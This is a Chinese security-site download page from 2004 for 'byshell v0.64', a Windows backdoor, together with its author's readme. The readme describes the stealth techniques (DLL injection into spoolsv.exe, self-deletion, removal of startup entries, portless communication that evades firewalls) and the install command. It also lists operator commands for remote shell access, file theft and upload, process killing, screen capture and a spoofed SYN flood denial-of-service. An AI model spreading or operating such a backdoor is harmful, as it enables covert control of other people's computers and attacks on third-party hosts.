xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加工具English Version

byshell064.rar


提交时间:2004-12-25
提交用户:baiyuanfan
工具分类:后门程序
运行平台:Windows
工具大小:88603 Bytes
文件MD5 :2b6f7424ad15fb203dafe7a61cbd9d30
工具来源:原创

byshell    v0.64
                        author:"by"
    byshell v0.64,用户态实现无进程无DLL无硬盘文件无启动项的后门程序。利用线程注射DLL到系统进程,解除DLL映射并删除自身文件和启动项,关机时恢复。大量的借鉴和学习了农民的cmdbind2的思想,在这里对农民前辈无私共享的精神致以120分感谢。原代码和注释写的比较凌乱,和本人的不好的程序风格有关,望大家谅解:(目前利用用户自定义协议实现无端口。可以穿过一些防火墙,如天网。但网络稳定性大大不如0.63,并且不支持在同一台机器上同时安装客户和服务端进行调试,与XP SP2有冲突。这个版本还不是很稳定,大家帮我测试和修改。可能以后会改成无连接或端口复用的:)作者允许此软件及其源代码自由传播,但引用时应注明原出处。在联系作者并得到同意之前,不得将此软件改编或删选后用作商业用途,但可用作学习和私人用途。
    本软件仅仅支持NT以上的Wind0wZ系统。第一次使用时,在服务端把ntboot.exe和ntboot.dll放在同一目录下,执行ntboot.exe -install,安装完成后安装文件可以删除。以后当服务端上网,byshell会注射到spoolsv.exe中,可以自行修改原码改变注射的进程名。
        
    符号#是这个软件的命令提示符。目前支持的命令:
cmd        在此后跟你要执行的cmd命令,注意:只能执行一条单独的命令。仅仅支持NT以上的Wind0wZ系统。
    eg.  #cmddir c:\winnt
shell        输入此命令后,进入交互的远程cmd,直到键入endshell返回#提示符。仅仅支持NT以上的Wind0wZ系统。
endshell    从shell状态返回#提示符。
chpass        改变后门密码。默认为“by”。
    eg.  #chpass123456
byver        查看连接的服务端的版本,新旧版本的客户服务端间交互时,可能有严重的兼容性问题。
sysinfo        取得对方的基本系统信息。
pslist        对方进程列表。
pskill        杀死对方指定进程。在此后跟你要杀死的进程的PID(由pslist得到)。
    eg.  #pskill972
modlist        对方指定进程加载的所有DLL的列表。在此后跟你要查看的进程的PID(由pslist得到)。
    eg.  #modlist972
get        在此软件的连接上下载远程文件。命令格式:
    get <tab键> 本地保存文件名 <tab键> 远程下载文件名
    eg.  #get    c:\download\file.txt    d:\sourcefile.txt
put        在此软件的连接上向远程上传文件。命令格式:
    put <tab键> 远程保存文件名 <tab键> 本地上传文件名
    eg.  #put    d:\receive\file.txt    c:\sourcefile.txt
reboot        重启对方机器。
dettach        解除byshell的重启,下次重启就不会有byshell了。
screen        远程截屏到本地保存为c:\remotedesktop.bmp。查看此文件可监视远程屏幕。(似乎在0.63以后的版本不能使用,我不太明白原因,哪位高手如能指教非常感谢)
    搞笑功能,开怀一笑:
popmsg        弹出信息框。
    eg.  #popmsghello,are you all right?
swapmouse    远程鼠标左右键交换。
storemouse    远程鼠标左右键复原。


警告:以下的SYN功能有一定的危险性,仅仅用做测试。如果用户非法使用此功能攻击合法站点,将自己承担全部法律后果。
SYN        使用服务端发起SYN洪水的拒绝服务攻击测试。
参数:SYN 测试对象 测试的分钟数 IP伪造类型(可选参数,0是完全伪造,1是C段伪造,2是不伪造,默认为0)  发包频率(默认100个休息1ms)攻击对象端口(可选参数,默认为80WWW端口) 使用的端口(可选参数,0是随机变化,默认为0)
如果选择了某个可选参数,那么在它左边的可选参数就必须被选择,在它右边的可选参数则可以忽略。
    eg.    #SYN 172.18.1.5 15
    eg.    #SYN 172.18.1.5 15 1
    eg.    #SYN 172.18.1.5 15 1 1000 445 12345
queryDOS    查询服务端SYN攻击测试的详细情况。
endDOS        强制结束服务端的SYN作业。

    由于作者是初学者,水平有限,程序一定存在很多BUG。谢谢各位朋友、前辈指教:
        华东师大软件学院04级     baiyuanfan@163.com
    特别感谢在我写这个小软件时给了我很大帮助的gxisone(谷夕),glacier(黄鑫)和xfocus.net的所有朋友,是他们的支持使我这个初学者能够克服困难和疑惑,最终完成这个程序。

>> 下载 <<